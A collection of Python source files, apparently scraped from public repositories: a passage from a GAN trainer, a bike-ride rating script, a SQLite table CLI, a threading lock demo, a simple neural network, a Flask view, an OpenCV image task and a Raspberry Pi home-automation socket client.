label_order.long().cuda(device=self.device)\n key_numbers = key_numbers.long().cuda(device=self.device)\n key_mask = key_mask.cuda(device=self.device)\n other_mask = other_mask.cuda(device=self.device)\n box_numbers = box_numbers.long().cuda(device=self.device)\n # print(label_order)\n box_output, loss_iteration = self.generator(labels, captions, caption_lengths, label_order,\n key_mask, other_mask, True, boxes)\n mean_loss = torch.mean(loss_iteration)\n self.generator_optimizer.zero_grad()\n mean_loss.backward()\n # 
print(\"Attention Weight:\", self.coreModel.predict_module.text_attention.final.weight)\n # print(\"Attention Grad:\", self.coreModel.predict_module.text_attention.final.weight.grad)\n self.generator_optimizer.step()\n if iteration % self.params['print_every'] == 0:\n print_divider(log=False)\n item_number = torch.sum((key_mask[0] + other_mask[0]), dim=-1)\n print(\"Epoch: {}, Iteration: {}, Loss: {} \".format(epoch, iteration, mean_loss))\n # print(box_output[0][:item_number])\n # print(boxes[0][:item_number])\n _, _, iou_score_inst, iou_key_score_inst = calculate_criteria(\n predicted_boxes=box_output[0][:item_number],\n predicted_labels=labels[0][:item_number],\n boxes=boxes[0][:item_number],\n labels=labels[0][:item_number],\n key_number=key_numbers[0])\n # print(box_output[0][:min(item_number.item(), 8)])\n # print(boxes[0][:min(item_number.item(), 8)])\n print(\"IoU_score: {}, Key IoU_score: {}\".format(iou_score_inst, iou_key_score_inst))\n self.save(self.generator, self.params['saved_path'] + \"PreTrain-{}.pt\".format(epoch))\n avg_total_iou, avg_total_key_iou, avg_total_cover = self.generator_evaluate(preTrain=True)\n return avg_total_iou, avg_total_key_iou, avg_total_cover\n\n def generator_train(self):\n self.generator.train()\n self.discriminator.train()\n for iteration, (captions, boxes, labels, label_embeddings, caption_lengths, box_numbers,\n key_numbers, label_freq, label_prob, noun_list, noun_length, noun_mask,\n key_mask, other_mask, label_order) in enumerate(self.train_data_loader, 1):\n if captions.size(0) != self.params['batch_size']:\n break\n # captions: (batch_size, max_word_num, word_embedding_dim)\n # boxes: (batch_size, max_bbox_num, 4)\n # label: (batch_size, max_bbox_num)\n # caption_length, box_number: (batch_size)\n captions = captions.cuda(device=self.device)\n labels = labels.cuda(device=self.device)\n boxes = boxes.cuda(device=self.device)\n caption_lengths = caption_lengths.long().cuda(device=self.device)\n label_order = label_order.long().cuda(device=self.device)\n key_mask = key_mask.cuda(device=self.device)\n box_numbers = box_numbers.long().cuda(device=self.device)\n other_mask = other_mask.cuda(device=self.device)\n box_output, box_loss = self.generator(labels, captions, caption_lengths, label_order, key_mask, other_mask,\n False, boxes)\n result = self.discriminator(captions, caption_lengths, labels, box_output, box_numbers, label_order)\n g_loss = self.criterion(result, torch.ones_like(result).to(device=result.device))\n self.generator_optimizer.zero_grad()\n result_loss = g_loss # + box_loss # alpha = 1\n # print(\"g_loss: \", g_loss)\n # print(\"box_loss: \", box_loss)\n result_loss.backward()\n self.generator_optimizer.step()\n # print(\"Weight: \", self.generator.adjust_layer.predict_module.text_attention.final.weight)\n # print(\"Gradient: \", self.generator.adjust_layer.predict_module.text_attention.final.weight.grad)\n if iteration % self.params['print_every'] == 0:\n print_divider(log=False)\n item_number = torch.sum((key_mask[0] + other_mask[0]), dim=-1)\n print(\"Iteration: {}, Loss: {} \".format(iteration, result_loss))\n # print(box_output[0][:item_number])\n # print(boxes[0][:item_number])\n _, _, iou_score_inst, iou_key_score_inst = calculate_criteria(\n predicted_boxes=box_output[0][:item_number],\n predicted_labels=labels[0][:item_number],\n boxes=boxes[0][:item_number],\n labels=labels[0][:item_number],\n key_number=key_numbers[0])\n print(\"Prediction:\", box_output[0][:min(item_number.item(), 8)])\n print(\"Target:\", 
boxes[0][:min(item_number.item(), 8)])\n print(\"Discriminator Result: \", torch.mean(result.squeeze()))\n print(\"g_loss: \", g_loss)\n print(\"box loss: \", box_loss)\n print(\"IoU_score: {}, Key IoU_score: {}\".format(iou_score_inst, iou_key_score_inst))\n\n def discriminator_train(self):\n self.generator.eval()\n self.discriminator.train()\n for iteration, (captions, boxes, labels, label_embeddings, caption_lengths, box_numbers,\n key_numbers, label_freq, label_prob, noun_list, noun_length, noun_mask,\n key_mask, other_mask, label_order) in enumerate(self.train_data_loader, 1):\n if captions.size(0) != self.params['batch_size']:\n break\n # captions: (batch_size, max_word_num, word_embedding_dim)\n # boxes: (batch_size, max_bbox_num, 4)\n # label: (batch_size, max_bbox_num)\n # caption_length, box_number: (batch_size)\n captions = captions.cuda(device=self.device)\n boxes = boxes.cuda(device=self.device)\n labels = labels.cuda(device=self.device)\n caption_lengths = caption_lengths.long().cuda(device=self.device)\n label_order = label_order.long().cuda(device=self.device)\n key_numbers = key_numbers.long().cuda(device=self.device)\n key_mask = key_mask.cuda(device=self.device)\n other_mask = other_mask.cuda(device=self.device)\n box_numbers = box_numbers.long().cuda(device=self.device)\n box_output, _ = self.generator(labels, captions, caption_lengths, label_order, key_mask, other_mask, False)\n box_output = box_output.detach()\n fake_result = self.discriminator(captions, caption_lengths, labels, box_output, box_numbers,\n label_order)\n real_result = self.discriminator(captions, caption_lengths, labels, boxes, box_numbers, label_order)\n fake_output = fake_result > 0.5\n # print(\"Fake OUTPUT:\", fake_output.squeeze())\n real_output = real_result > 0.5\n # print(\"Real OUTPUT:\", real_output.squeeze())\n fake_accuracy = torch.sum(fake_output == 0).float() / self.params['batch_size']\n real_accuracy = torch.sum(real_output == 1).float() / self.params['batch_size']\n d_fake_error = self.criterion(fake_result, torch.zeros_like(fake_result).to(device=fake_result.device))\n d_real_error = self.criterion(real_result, torch.ones_like(real_result).to(device=real_result.device))\n self.discriminator_optimizer.zero_grad()\n result_loss = d_fake_error + d_real_error\n result_loss.backward()\n self.discriminator_optimizer.step()\n if iteration % self.params['print_every'] == 0:\n print(\"Iteration : {}, Fake Acc: {}, Real Acc : {}\".format(iteration, fake_accuracy, real_accuracy))\n print(\"Discriminator Result(Fake): \", torch.mean(fake_result.squeeze()))\n print(\"Discriminator Result(Real): \", torch.mean(real_result.squeeze()))\n self.discriminator_evaluate()\n\n def train(self, load=False):\n print(\"Begin to train\")\n if load:\n self.load(self.generator, self.params['saved_path'] + \"PreTrain-2.pt\")\n else:\n last_avg_total_iou = last_avg_total_key_iou = last_avg_total_cover = 0\n last_epoch = 0\n for epoch in range(self.params['pre_epoch_num']):\n avg_total_iou, avg_total_key_iou, avg_total_cover = self.generator_pre_train(epoch)\n if avg_total_iou <= last_avg_total_iou and epoch - last_epoch >= 5:\n print(\"Early Stop!\")\n break\n if last_avg_total_iou <= avg_total_iou:\n last_avg_total_key_iou, last_avg_total_cover, last_avg_total_iou = avg_total_key_iou, avg_total_cover, avg_total_iou\n last_epoch = epoch\n print(\"Best Average Key IoU: {}, Best Average IoU: {}, Best Coverage: {}, Epoch : {}\".format(\n last_avg_total_key_iou,\n last_avg_total_iou,\n last_avg_total_cover,\n 
last_epoch))\n\n for epoch in range(self.params['epoch_num']):\n print(\"No. {} Epoch\".format(epoch))\n step = stepFromEpoch(epoch)\n for d_index in range(1):\n print(\"Begin to train Discriminator: No.{} step\".format(d_index))\n self.discriminator_train() # todo: fix it\n\n # Evaluate Discriminator\n print(\"Discriminator Evaluate Result for Epoch {}\".format(epoch))\n self.save(self.discriminator, self.params['saved_path'] + \"Dis-{}.pt\".format(epoch))\n self.discriminator_evaluate() # todo: fix it\n\n for g_index in range(step):\n print(\"Begin to train Generator: No.{} step\".format(g_index))\n self.generator_train() # todo: fix it\n\n # Evaluate Generator\n print(\"Generator Evaluate Result for Epoch {}\".format(epoch))\n self.save(self.generator, self.params['saved_path'] + \"Gen-{}.pt\".format(epoch))\n avg_total_iou, avg_total_key_iou, avg_total_cover = self.generator_evaluate(preTrain=False) # todo: fix it\n\n def discriminator_evaluate(self, model_path=None):\n self.discriminator.eval()\n self.generator.eval()\n if model_path is not None:\n self.load(self.discriminator, model_path)\n total_accuracy = []\n with torch.no_grad():\n for iteration, (captions, boxes, labels, label_embeddings, caption_lengths, box_numbers,\n key_numbers, label_freq, label_prob, noun_list, noun_length, noun_mask,\n key_mask, other_mask, label_order) in enumerate(self.val_data_loader, 1):\n if captions.size(0) != self.params['batch_size']:\n break\n captions = captions.cuda(device=self.device)\n boxes = boxes.cuda(device=self.device)\n labels = labels.cuda(device=self.device)\n caption_lengths = caption_lengths.long().cuda(device=self.device)\n label_order = label_order.long().cuda(device=self.device)\n key_numbers = key_numbers.long().cuda(device=self.device)\n key_mask = key_mask.cuda(device=self.device)\n box_numbers = box_numbers.long().cuda(device=self.device)\n other_mask = other_mask.cuda(device=self.device)\n box_output, _ = self.generator(labels, captions, caption_lengths, label_order, key_mask, other_mask,\n False)\n box_output = box_output.detach()\n choice = random.randint(0, 1)\n if choice == 1:\n result = self.discriminator(captions, caption_lengths, labels, boxes, box_numbers, label_order)\n else:\n result = self.discriminator(captions, caption_lengths, labels, box_output, box_numbers, label_order)\n predicted = result > 0.5\n target = torch.zeros_like(predicted) + choice\n accuracy = torch.sum(predicted == target).float() / target.size(0)\n total_accuracy.append(accuracy)\n avg_accuracy = sum(total_accuracy) / len(total_accuracy)\n print(\"Evaluate Result: Average Accuracy: {}\".format(avg_accuracy))\n\n def generator_evaluate(self, preTrain=False, model_path=None):\n total_iou = []\n total_key_iou = []\n total_cover = []\n if model_path is not None:\n self.load(self.generator, model_path)\n self.discriminator.eval()\n self.generator.eval()\n with torch.no_grad():\n for iteration, (captions, boxes, labels, label_embeddings, caption_lengths, box_numbers,\n key_numbers, label_freq, label_prob, noun_list, noun_length, noun_mask,\n key_mask, other_mask, label_order) in enumerate(self.val_data_loader, 1):\n if captions.size(0) != self.params['batch_size']:\n break\n captions = captions.cuda(device=self.device)\n boxes = boxes.cuda(device=self.device)\n labels = labels.cuda(device=self.device)\n caption_lengths = caption_lengths.long().cuda(device=self.device)\n label_order = label_order.long().cuda(device=self.device)\n key_numbers = key_numbers.long().cuda(device=self.device)\n key_mask = 
key_mask.cuda(device=self.device)\n other_mask = other_mask.cuda(device=self.device)\n box_numbers = box_numbers.long().cuda(device=self.device)\n\n iou_score_iteration = []\n iou_key_score_iteration = []\n cover_percent_iteration = []\n box_output, _ = self.generator(labels, captions, caption_lengths, label_order, key_mask, other_mask,\n preTrain)\n for batch_idx in range(captions.size(0)):\n box_output_inst = box_output[batch_idx]\n box_target_inst = boxes[batch_idx]\n label_output_inst = label_target_inst = labels[batch_idx]\n key_number_inst = key_numbers[batch_idx]\n box_number_inst = box_numbers[batch_idx]\n _, _, iou_score_inst, iou_key_score_inst = calculate_criteria(\n predicted_labels=label_output_inst[:box_number_inst],\n predicted_boxes=box_output_inst[:box_number_inst],\n labels=label_target_inst[:box_number_inst],\n boxes=box_target_inst[:box_number_inst],\n key_number=key_number_inst)\n cover_percent = coverage(box_output_inst[:box_number_inst])\n cover_percent_iteration.append(cover_percent)\n iou_score_iteration.append(iou_score_inst)\n iou_key_score_iteration.append(iou_key_score_inst)\n\n item_number = torch.sum((key_mask[0] + other_mask[0]), dim=-1)\n # print(\"Predicted boxes:\", box_output[0][:min(item_number.item(), 8)])\n # print(\"Target boxes:\", boxes[0][:min(item_number.item(), 8)])\n\n avg_cover = sum(cover_percent_iteration) / len(cover_percent_iteration)\n avg_iou = sum(iou_score_iteration) / len(iou_score_iteration)\n avg_iou_key = sum(iou_key_score_iteration) / len(iou_key_score_iteration)\n total_iou.append(avg_iou)\n total_key_iou.append(avg_iou_key)\n total_cover.append(avg_cover)\n print_divider()\n # print(\"Iteration: {}, average IoU_score: {}, average key IoU_score: {}, average coverage: {}\".format(\n # iteration, avg_iou, avg_iou_key, avg_cover))\n avg_total_iou = sum(total_iou) / len(total_iou)\n avg_total_key_iou = sum(total_key_iou) / len(total_key_iou)\n avg_total_cover = sum(total_cover) / len(total_cover)\n print(\"Average IoU_score: {}, Average key IoU_score: {}, Average coverage: {}\".format(avg_total_iou,\n avg_total_key_iou,\n avg_total_cover))\n return avg_total_iou, avg_total_key_iou, avg_total_cover\n\n def save(self, model, path):\n print('Model saved to path: {}'.format(path))\n torch.save(model.state_dict(), path)\n\n def load(self, model, path):\n print('Model loaded from path: {}'.format(path))\n model.load_state_dict(torch.load(path))\n\n\nif __name__ == '__main__':\n a = torch.tensor([1, 2, 3, 4])\n print(label2word(a))\n","sub_path":"trainers/trainer_gan.py","file_name":"trainer_gan.py","file_ext":"py","file_size_in_byte":21607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510182088","text":"def hows_the_x(traffic, weather, fitness, bike, company):\n '''A simple rating scale which takes five variables and returns the average accompanied by a contrived summary.\n May easily be adapted to suit your fancy.'''\n\n traffic = int(traffic)\n weather = int(weather)\n fitness = int(fitness)\n bike = int(bike)\n company = int(company)\n\n t = traffic + weather + fitness + bike + company\n t = int(t / .5)\n ts = str(t)\n\n if t <= 0:\n return '\\nThat\\'s a ' + ts + ' % bike ride. You\\'re lucky to still be alive! Go and have a lie down.'\n elif t > 0 and t <= 10:\n return '\\nThat\\'s a ' + ts + ' % bike ride. Blimy \\'O\\' Reily! Things can only get better.'\n elif t > 10 and t <= 20:\n return '\\nThat\\'s a ' + ts + ' % bike ride. 
Told you things would get better.'\n    elif t > 20 and t <= 30:\n        return '\\nThat\\'s a ' + ts + ' % bike ride. The toughest part is getting started.'\n    elif t > 30 and t <= 40:\n        return '\\nThat\\'s a ' + ts + ' % bike ride. Well done for having a go.'\n    elif t > 40 and t <= 50:\n        return '\\nThat\\'s a ' + ts + ' % bike ride. Nearly half way to enjoying yourself! Keep at it.'\n    elif t > 50 and t <= 60:\n        return '\\nThat\\'s a ' + ts + ' % bike ride. More good than bad.'\n    elif t > 60 and t <= 70:\n        return '\\nThat\\'s a ' + ts + ' % bike ride. Don\\'t take it for granted. Keep up the good work.'\n    elif t > 70 and t <= 80:\n        return '\\nThat\\'s a ' + ts + ' % bike ride. Lots of positive gains being felt.'\n    elif t > 80 and t <= 90:\n        return '\\nThat\\'s a ' + ts + ' % bike ride. Why did you stop?'\n    elif t > 90 and t <= 100:\n        return '\\nThat\\'s a ' + ts + ' % bike ride. You crushed it, peloton!'\n    else:\n        return '\\nThat\\'s a ' + ts + ' % bike ride. You must be tripping!'\n\n\nprint('How was your bike ride? Rate the following five aspects of your ride. 0 (the worst) 10 (the best).')\n\n\nprint(hows_the_x(input('\\nTraffic: '), input('\\nWeather: '), input('\\nFitness: '),\n                 input('\\nBike: '),\n                 input('\\nCompany: ')))\n","sub_path":"bike_ride.py","file_name":"bike_ride.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282934970","text":"import sqlite3\nimport sys\nimport time\n    ### START OF SQLITE SETUP ### Need to place this into the sqlite functions as a parameter..... so that it can be modular\n    \nconn = sqlite3.connect('database.db')\nc = conn.cursor()\n    ### END OF SQLITE SETUP ###\nloop_toggle = True    \n#user_input = input(\":\")\n    #user input starting request - create this into a user request function\ndef string_analize(string):\n    splited_list = string.split()\n    print(splited_list)\ndef User_input(text):\n    user_input = input(text)\n    print(user_input)\n    return(user_input)\n    \ndef input_check(the_input,text):\n    if str(the_input) == text:\n        print(\"True\")\n        return True\n    else:\n        print(\"Returned false\")\n        return False\n\ndef delete_table():\n    new_input = input(\"Name of Table? \")\n    c.execute(\" drop table if exists %s\" %new_input)\n    print(\"dropped table\")\n\ndef create_table():\n    new_input = input(\"table name? \")\n    cmd = '''CREATE TABLE IF NOT EXISTS %s (word text) ''' % (new_input)\n    print(cmd)\n    c.execute(cmd)\n    print(\"Created Table called %s\" % (new_input))\n\ndef print_table():\n    tableListQuery = \"SELECT name FROM sqlite_master WHERE type='table' ORDER BY Name\"\n    c.execute(tableListQuery)\n    for tables in c:\n        print(tables)\n\ndef updateDb(file_name,table_name):\n    file = open(file_name, 'r')\n    for name in file: \n        fixed_name = name.rstrip()\n        c.execute(\"select word from %s where word=?\" % table_name, (fixed_name,))\n        data = c.fetchone()\n        if data == None:\n            print ('not found')\n            c.execute('insert into %s values(\"%s\")' % (table_name, fixed_name))\n            print('Added word named %s' %fixed_name)\n        else:\n            print ('found')\n    file.close()\n\ndef user_input_cmd(Input):\n    the_input = Input\n    user_input = the_input\n    if input_check(the_input,\"table check\"):\n        new_input=User_input(\"What is the name of the table to test? 
\")\n stmt = \"SELECT name FROM sqlite_master WHERE type='table' AND name='%s'\" %new_input\n c.execute(stmt)\n result = c.fetchone()\n if result:\n print(\"YES\")# there is a table named \"tableName\"\n else:\n print(\"NO\")# there are no tables named \"tableName\"\n elif input_check(the_input,\"update\"):\n file_name = input(\"Name of file? \")\n table_name = input(\"Name of Table? \")\n \n updateDb(file_name,table_name)\n elif input_check(the_input,\"create table\"):\n new_input = input(\"table name? \")\n if input_check(new_input,\"quit\") == False:\n cmd = '''CREATE TABLE IF NOT EXISTS %s (word text) ''' % (new_input)\n print(cmd)\n c.execute(cmd)\n print(\"Created Table called %s\" % (new_input))\n \n elif input_check(the_input,\"delete table\"):\n delete_table()\n \n elif input_check(the_input,\"list tables\"):\n print_table()\n \n elif input_check(the_input,\"quit\"):\n print(\"quiting....\")\n conn.commit() # these need to be in the functions....\n conn.close()\n sys.exit() \n elif input_check(the_input,\"get time\"):\n print(time.localtime())\n \n \nwhile True:\n the_input = input(\":\")\n #(the_input)\n user_input_cmd(the_input)\n \n \n \n #testing if the rows reseaved the date correctly\n \n\n\n ### SQLITE REFRANCE CODE ###\n\n # Create table\n#c.execute('''CREATE TABLE words\n #(word text, is_noun text, is_verb text, adverbs text, adjectives text)''')\n\n # Insert a row of data\n#c.execute(\"INSERT INTO words VALUES ('time','Yes','No','No','No')\")\n #remoe a row of data\n#c.execute(\"DELETE FROM words WHERE word=?\", (\"time\",))\n #removes table\n#c.execute(\"DROP TABLE words\" )\n # Save (commit) the changes\n#conn.commit()\n#cur.execute(\"UPDATE Cars SET Price=? WHERE Id=?\", (uPrice, uId)) change data in row\n # We can also close the connection if we are done with it.\n # Just be sure any changes have been committed or they will be lost.\n#c.execute(\"alter table table_name add column '%s' 'float'\" % author)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159663171","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Time : 2021/3/14 8:09\n# @Author : john\n# @File : c09_03_rlock.py\n\nimport threading\nimport time\n\n# Lock 普通锁不可以嵌套, RLock可以嵌套\n\nmutex = threading.RLock()\n\n\nclass MyThread(threading.Thread):\n def run(self):\n if mutex.acquire(1):\n print(f'thread {self.name} get mutex')\n time.sleep(1)\n mutex.acquire()\n mutex.release()\n mutex.release()\n\n\nif __name__ == '__main__':\n for i in range(10):\n t = MyThread()\n t.start()","sub_path":"week11/c09_03_rlock.py","file_name":"c09_03_rlock.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"254484889","text":"import math\nimport numpy as np\nimport random as rand\n\n\ndef sigmoid(x):\n\ttry:\n\t\treturn 1 / (1 + math.exp(-x))\n\texcept:\n\t\treturn 0\n\ndef dsigmoid(y):\n\treturn y * (1 - y)\n\nclass FeedForward:\n\tdef __init__(self, input_size, hidden_size, output_size, lr):\n\t\tself.input_size = input_size\n\t\tself.hidden_size = hidden_size\n\t\tself.output_size = output_size\n\t\tself.lr = lr\n\n\t\tself.weights_ih = np.random.rand(hidden_size, input_size) * 2 - 1\n\t\tself.weights_ho = np.random.rand(output_size, hidden_size) * 2 - 1\n\t\tself.bias_h = np.random.rand(hidden_size, 1)\n\t\tself.bias_o = np.random.rand(output_size, 1)\n\n\n\tdef 
__str__(self):\n\t\treturn 'FeedForward: ([%d->%d->%d], %f)' %(self.input_size, self.hidden_size, self.output_size, self.lr)\n\n\n\tdef predict(self, input):\n\t\tif not self.is_valid_input(input):\n\t\t\treturn None\n\n\t\tinput = np.asmatrix(input).transpose()\n\t\thidden = self.weights_ih * input\n\t\thidden += self.bias_h\n\t\tself.map_matrix(hidden, sigmoid)\n\n\t\toutput = self.weights_ho * hidden\n\t\toutput += self.bias_o\n\t\tself.map_matrix(output, sigmoid)\n\t\treturn np.asarray(output).reshape(-1)\n\n\n\tdef train(self, input, target):\n\t\tinput = np.asmatrix(input).transpose()\n\t\ttarget = np.asmatrix(target).transpose()\n\n\t\thidden = self.weights_ih * input\n\t\thidden += self.bias_h\n\t\thidden = self.map_matrix(hidden, sigmoid)\n\n\t\toutput = self.weights_ho * hidden\n\t\toutput += self.bias_o\n\t\toutput = self.map_matrix(output, sigmoid)\n\t\toutput_err = target - output\n\n\t\twho_t = np.transpose(self.weights_ho)\n\t\thidden_err = who_t * output_err\n\n\t\t# gradients use the derivative of the activation; work on copies so the\n\t\t# stored activations are not mutated in place by map_matrix\n\t\toutput_grad = self.map_matrix(output.copy(), dsigmoid)\n\t\tfor row in range(output_grad.shape[0]):\n\t\t\tfor col in range(output_grad.shape[1]):\n\t\t\t\toutput_grad[row][col] *= output_err[row][col]\n\t\t\n\t\toutput_grad *= self.lr\n\n\t\thidden_grad = self.map_matrix(hidden.copy(), dsigmoid)\n\t\tfor row in range(hidden_grad.shape[0]):\n\t\t\tfor col in range(hidden_grad.shape[1]):\n\t\t\t\thidden_grad[row][col] *= hidden_err[row][col]\n\t\t\t\n\t\thidden_grad *= self.lr\n\n\t\thidden_t = np.transpose(hidden)\n\t\toutput_delta_w = output_grad * hidden_t\n\t\tself.weights_ho += output_delta_w\n\t\tself.bias_o += output_grad\n\n\t\tinputs_t = np.transpose(input)\n\t\thidden_delta_w = hidden_grad * inputs_t\n\t\tself.weights_ih += hidden_delta_w\n\t\tself.bias_h += hidden_grad\n\n\n\tdef is_valid_input(self, input):\n\t\tif type(input) != type(np.array([])):\n\t\t\treturn False\n\n\t\tif len(input) != self.input_size:\n\t\t\treturn False\n\n\t\treturn True\n\n\n\tdef is_valid_target(self, target):\n\t\tif type(target) != type(np.array([])):\n\t\t\treturn False\n\t\t\n\t\tif len(target) != self.output_size:\n\t\t\treturn False\n\t\t\n\t\treturn True\n\n\n\tdef map_matrix(self, matrix, func):\n\t\tfor row in range(matrix.shape[0]):\n\t\t\tfor col in range(matrix.shape[1]):\n\t\t\t\tmatrix[row][col] = func(matrix[row][col])\n\t\t\n\t\treturn matrix\n","sub_path":"simplenn/feedforward.py","file_name":"feedforward.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"240635393","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nfrom flask import g, redirect, render_template, request, url_for\nfrom flask.ext.babel import gettext\nfrom sqlalchemy.sql.expression import or_\n\nfrom models.bill import Bill\nfrom models.bill_feed import BillFeed\nfrom models.feed import Feed\nfrom models.keyword import Keyword\nfrom models.person import Person\nfrom utils.jinja import breadcrumb, jsonify\nfrom utils.paginate import MoreQuery\n\n\ndef register(app):\n\n    app.views['mypage'] = 'mypage'\n\n    more = MoreQuery(Feed, 'mypage_feeds', 'desc', 'feeds')\n\n    @app.route('/mypage/', methods=['GET'])\n    @breadcrumb(app)\n    def mypage():\n        if g.user.is_anonymous():\n            return redirect(url_for('login'))\n\n        data = more.query(my_feeds())\n        return render_template('mypage.html', **data)\n\n    @app.route('/mypage/feeds', methods=['GET'])\n    def mypage_feeds():\n        if g.user.is_anonymous():\n            return redirect(url_for('login'))\n\n        data = more.query(my_feeds(), 
_from=request.args.get('before', None))\n data['html'] = render_template('feeds.html', **data)\n del data['feeds']\n return jsonify(data)\n\n\ndef my_feeds():\n feeds = Feed.query\\\n .with_polymorphic('*')\\\n .join(BillFeed.bill)\\\n .outerjoin(Bill.cosponsors)\\\n .outerjoin(Bill.keywords)\\\n .filter(or_(\n Keyword.id.in_(k.id for k in g.user.favorite_keywords),\n Person.id.in_(p.id for p in g.user.favorite_people),\n ))\\\n .order_by(Feed.id.desc())\n return feeds\n\n","sub_path":"views/mypage.py","file_name":"mypage.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230045815","text":"###############################################################################\r\n## Author: Team Supply Bot\r\n## Edition: eYRC 2019-20\r\n## Instructions: Do Not modify the basic skeletal structure of given APIs!!!\r\n###############################################################################\r\n\r\n\r\n######################\r\n## Essential libraries\r\n######################\r\nimport cv2\r\nimport numpy as np\r\nimport os\r\nimport math\r\nimport csv\r\n\r\n\r\n\r\n\r\n########################################################################\r\n## using os to generalise Input-Output\r\n########################################################################\r\ncodes_folder_path = os.path.abspath('.')\r\nimages_folder_path = os.path.abspath(os.path.join('..', 'Images'))\r\ngenerated_folder_path = os.path.abspath(os.path.join('..', 'Generated'))\r\n\r\n\r\n\r\n\r\n############################################\r\n## Build your algorithm in this function\r\n## ip_image: is the array of the input image\r\n## imshow helps you view that you have loaded\r\n## the corresponding image\r\n############################################\r\ndef process(ip_image):\r\n ###########################\r\n ## Your Code goes here\r\n ## placeholder image\r\n sector_image = np.ones(ip_image.shape[:2],np.uint8)*255\r\n ## check value is white or not\r\n print(sector_image[0,0])\r\n img_gray = cv2.cvtColor(ip_image, cv2.COLOR_BGR2GRAY)\r\n ret,thresh = cv2.threshold(img_gray,254,255,cv2.THRESH_BINARY)\r\n contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_NONE)\r\n\r\n #Check if its 2 or 3.\r\n rows, cols = ip_image.shape[:2]\r\n center_x, center_y = rows//2, cols//2\r\n matrix1 = (contours[2])[0]\r\n matrix2 = (contours[3])[0] \r\n dist1 = math.sqrt((matrix1[0, 0] - center_x)**2 + (matrix1[0, 1] - center_y)**2)\r\n dist2 = math.sqrt((matrix2[0, 0] - center_x)**2 + (matrix2[0, 1] - center_y)**2)\r\n if dist1 > dist2:\r\n req_matrix = 2\r\n else:\r\n req_matrix = 3\r\n\r\n cimg = np.ones_like(img_gray)*255\r\n print(cimg)\r\n cv2.drawContours(cimg, contours, req_matrix, color=0, thickness=-1)\r\n sector_image = cimg\r\n ###########################\r\n cv2.imshow(\"window\", sector_image)\r\n cv2.waitKey(0);\r\n return sector_image\r\n\r\n\r\n\r\n\r\n \r\n####################################################################\r\n## The main program which provides read in input of one image at a\r\n## time to process function in which you will code your generalized\r\n## output computing code\r\n## Do not modify this code!!!\r\n####################################################################\r\ndef main():\r\n ################################################################\r\n ## variable declarations\r\n ################################################################\r\n i = 1\r\n ## Reading 1 image 
at a time from the Images folder\r\n for image_name in os.listdir(images_folder_path):\r\n ## verifying name of image\r\n print(image_name)\r\n ## reading in image \r\n ip_image = cv2.imread(images_folder_path+\"/\"+image_name)\r\n ## verifying image has content\r\n print(ip_image.shape)\r\n ## passing read in image to process function\r\n sector_image = process(ip_image)\r\n ## saving the output in an image of said name in the Generated folder\r\n cv2.imwrite(generated_folder_path+\"/\"+\"image_\"+str(i)+\"_fill_in.png\", sector_image)\r\n i+=1\r\n\r\n\r\n \r\n\r\n############################################################################################\r\n## main function\r\n############################################################################################\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"task1#sb/Task1.2/Codes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"324639416","text":"#!/usr/bin/env python3\n\nimport socket\nfrom ControlSenseHat import ControlSH\n\nclass SocketClient:\n\n\tdef __init__(self, host, port):\n\t\tself.host = host\n\t\tself.port = port\n\t\tself.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tself.conn.connect((host, port))\n\t\tself.closed = False\n\n\n\tdef write(self, message, eenheid=None):\n\t\tif eenheid is not None:\n\t\t\tmessage = message + str(eenheid)\n\n\t\tmessage = str(message) + '\\n'\n\t\tself.conn.sendall(bytes(message, encoding=\"ascii\"))\n\n\t\tprint('bericht verzonden ' + message)\n\n\n\tdef receive(self):\n\t\tdata = self.conn.recv(1024)\n\t\tprint('Received: ', data.decode('utf-8'))\n\n\t\tif data == b'exit\\r\\n':\n\t\t\tself.conn.close()\n\t\t\tself.closed = True\n\n\t\telif data == b'gt\\r\\n':\n\t\t\tself.write(ControlSH.getTemperature())\n\n\t\telif data == b'gh\\r\\n':\n\t\t\tself.write(ControlSH.getHumidity())\n\n\t\telif data == b'gp\\r\\n':\n\t\t\tself.write(ControlSH.getPressure())\n\n\t\telif data == b'sv\\r\\n':\n\t\t\tControlSH.setVerwarming()\n\t\t\tself.write('Verwarming aangezet')\n\n\t\telif data == b'uv\\r\\n':\n\t\t\tControlSH.unsetVerwarming()\n\t\t\tself.write('Verwarming uitgezet')\n\n\t\telif data == b'sl\\r\\n':\n\t\t\tControlSH.setLicht()\n\t\t\tself.write('Licht aangezet')\n\n\t\telif data == b'ul\\r\\n':\n\t\t\tControlSH.unsetLicht()\n\t\t\tself.write('Licht uitgezet')\n\t\t\t\n\n\tdef getClosed(self):\n\t\treturn self.closed\n\n\ndef main():\n\twhile True:\n\t\ttry:\n\t\t\tsocket1 = SocketClient('192.168.178.42', 6369)\n\t\t\t\n\t\t\twhile socket1.getClosed() != True:\n\t\t\t\tsocket1.receive()\n\t\texcept (ConnectionResetError, TimeoutError) as e:\n\t\t\tprint(e)\n\t\t\tcontinue\n\nif __name__ == '__main__':\n main()\n\t\n\n\t\t\t\n\t\t\n\t\t\n","sub_path":"RPi_Domotica/Python/TCP_Client.py","file_name":"TCP_Client.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 